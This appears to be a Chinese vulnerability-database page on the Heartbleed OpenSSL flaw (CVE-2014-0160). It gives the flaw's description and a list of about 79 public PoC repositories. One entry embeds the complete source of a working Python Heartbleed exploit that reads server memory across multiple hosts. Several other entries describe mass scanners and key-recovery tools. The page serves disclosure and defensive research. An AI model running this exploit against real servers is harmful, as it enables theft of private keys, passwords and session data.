一、 漏洞 CVE-2014-0160 基础信息
漏洞标题
N/A
来源:AIGC 神龙大模型
漏洞描述信息
在 OpenSSL 1.0.1 之前版本 1.0.1g 中,TLS 和 DTLS 实现未正确处理心跳扩展包,这允许远程攻击者通过构造的包从进程内存中获取敏感信息,例如读取与 d1_both.c 和 t1_lib.c 相关的私钥,即heartbleed漏洞。
来源:AIGC 神龙大模型
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
来源:AIGC 神龙大模型
漏洞类别
N/A
来源:AIGC 神龙大模型
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
漏洞标题
OpenSSL 缓冲区错误漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层(SSL v2/v3)和安全传输层(TLS v1)协议的通用加密库,它支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞,该漏洞源于当处理Heartbeat Extension数据包时,缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
缓冲区错误
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2014-0160 的公开POC
# POC 描述 源链接 神龙链接
1 A checker (site and tool) for CVE-2014-0160 https://github.com/FiloSottile/Heartbleed POC详情
2 OpenSSL CVE-2014-0160 Heartbleed vulnerability test https://github.com/titanous/heartbleeder POC详情
3 bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160). https://github.com/DominikTo/bleed POC详情
4 Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160). https://github.com/cyphar/heartthreader POC详情
5 Patch openssl #heartbleed with ansible https://github.com/jdauphant/patch-openssl-CVE-2014-0160 POC详情
6 Multi-threaded tool for scanning many hosts for CVE-2014-0160. https://github.com/musalbas/heartbleed-masstest POC详情
7 None https://github.com/obayesshelton/CVE-2014-0160-Scanner POC详情
8 Heartbleed (CVE-2014-0160) client exploit https://github.com/Lekensteyn/pacemaker POC详情
9 OpenSSL TLS heartbeat read overrun (CVE-2014-0160) https://github.com/isgroup/openmagic POC详情
10 openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor https://github.com/fb1h2s/CVE-2014-0160 POC详情
11 Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160 https://github.com/takeshixx/ssl-heartbleed.nse POC详情
12 Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160 https://github.com/roganartu/heartbleedchecker-chrome POC详情
13 Checks for vulnerabilities: CVE-2014-0160 https://github.com/zouguangxian/heartbleed POC详情
14 Test for SSL heartbeat vulnerability (CVE-2014-0160) https://github.com/sensepost/heartbleed-poc POC详情
15 A firefox extension and checker for CVE-2014-0160 https://github.com/proactiveRISK/heartbleed-extention POC详情
16 Test CIDR blocks for CVE-2014-0160/Heartbleed https://github.com/amerine/coronary POC详情
17 Heartbleed variants https://github.com/0x90/CVE-2014-0160 POC详情
18 None https://github.com/ice-security88/CVE-2014-0160 POC详情
19 This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls. https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker POC详情
20 CVE-2014-0160 mass test against subdomains https://github.com/siddolo/knockbleed POC详情
21 OpenSSL Heartbleed (CVE-2014-0160) Fix script https://github.com/sammyfung/openssl-heartbleed-fix POC详情
22 CVE-2014-0160 scanner https://github.com/a0726h77/heartbleed-test POC详情
23 POC for CVE-2014-0160 (Heartbleed) for DTLS https://github.com/hreese/heartbleed-dtls POC详情
24 Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160 https://github.com/wwwiretap/bleeding_onions POC详情
25 Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160) https://github.com/idkqh7/heatbleeding POC详情
26 Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160. https://github.com/GeeksXtreme/ssl-heartbleed.nse POC详情
27 A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability https://github.com/xlucas/heartbleed POC详情
28 A checker (site and tool) for CVE-2014-0160: https://github.com/indiw0rm/-Heartbleed- POC详情
29 OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools. https://github.com/einaros/heartbleed-tools POC详情
30 A checker (site and tool) for CVE-2014-0160 https://github.com/mozilla-services/Heartbleed POC详情
31 openssl Heartbleed bug(CVE-2014-0160) check for Node.js https://github.com/yryz/heartbleed.js POC详情
32 Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160) https://github.com/DisK0nn3cT/MaltegoHeartbleed POC详情
33 CVE-2014-0160 (Heartbeat Buffer over-read bug) https://github.com/OffensivePython/HeartLeak POC详情
34 Heartbleed (CVE-2014-0160) SSLv3 Scanner https://github.com/vortextube/ssl_scanner POC详情
35 :broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart: https://github.com/mpgn/heartbleed-PoC POC详情
36 #!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main() https://github.com/xanas/heartbleed.py POC详情
37 A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc.. https://github.com/iSCInc/heartbleed POC详情
38 None https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang POC详情
39 Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed https://github.com/hmlio/vaas-cve-2014-0160 POC详情
40 Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) https://github.com/hybridus/heartbleedscanner POC详情
41 Dockerfile for testing CVE-2014-0160 Heartbleed exploitation. https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx POC详情
42 Heartbleed https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin POC详情
43 来自:https://www.freebuf.com/articles/web/31700.html https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC POC详情
44 CVE-2014-0160 https://github.com/Saymeis/HeartBleed POC详情
45 cve-2014-0160 https://github.com/cved-sources/cve-2014-0160 POC详情
46 Demonstration of the Heartbleed Bug CVE-2014-0160 https://github.com/cheese-hub/heartbleed POC详情
47 None https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS POC详情
48 Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔 https://github.com/cldme/heartbleed-bug POC详情
49 Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste. https://github.com/ThanHuuTuan/Heartexploit POC详情
50 Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions) https://github.com/rouze-d/heartbleed POC详情
51 None https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed POC详情
52 CVE-2014-0160 OpenSSL Heartbleed Proof of Concept https://github.com/GuillermoEscobero/heartbleed POC详情
53 A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device https://github.com/clino-mania/A2SV--SSL-VUL-Scan POC详情
54 OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo. https://github.com/ingochris/heartpatch.us POC详情
55 A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸 https://github.com/BelminD/heartbleed POC详情
56 The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL/TLS to keep the connection alive. https://github.com/pierceoneill/bleeding-heart POC详情
57 None https://github.com/crypticdante/CVE-2014-0160_Heartbleed POC详情
58 fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160) https://github.com/GardeniaWhite/fuzzing POC详情
59 Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock: https://github.com/undacmic/heartbleed-proof-of-concept POC详情
60 Check for CVE-2014-0160 https://github.com/cbk914/heartbleed-checker POC详情
61 None https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin POC详情
62 None https://github.com/timsonner/cve-2014-0160-heartbleed POC详情
63 None https://github.com/H3xL00m/CVE-2014-0160_Heartbleed POC详情
64 None https://github.com/n3ov4n1sh/CVE-2014-0160_Heartbleed POC详情
65 None https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed POC详情
66 OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner. https://github.com/pblittle/aws-suture POC详情
67 None https://github.com/Sp3c73rSh4d0w/CVE-2014-0160_Heartbleed POC详情
68 None https://github.com/0xwh1pl4sh/CVE-2014-0160_Heartbleed POC详情
69 None https://github.com/N3rdyN3xus/CVE-2014-0160_Heartbleed POC详情
70 None https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed POC详情
71 None https://github.com/NyxByt3/CVE-2014-0160_Heartbleed POC详情
72 A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸 https://github.com/belmind/heartbleed POC详情
73 None https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed POC详情
74 None https://github.com/n3rdh4x0r/CVE-2014-0160_Heartbleed POC详情
75 None https://github.com/yashfren/CVE-2014-0160-HeartBleed POC详情
76 The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users. https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2014/CVE-2014-0160.yaml POC详情
77 None https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E6%BB%B4%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md POC详情
78 None https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md POC详情
79 https://github.com/vulhub/vulhub/blob/master/openssl/CVE-2014-0160/README.md POC详情
三、漏洞 CVE-2014-0160 的情报信息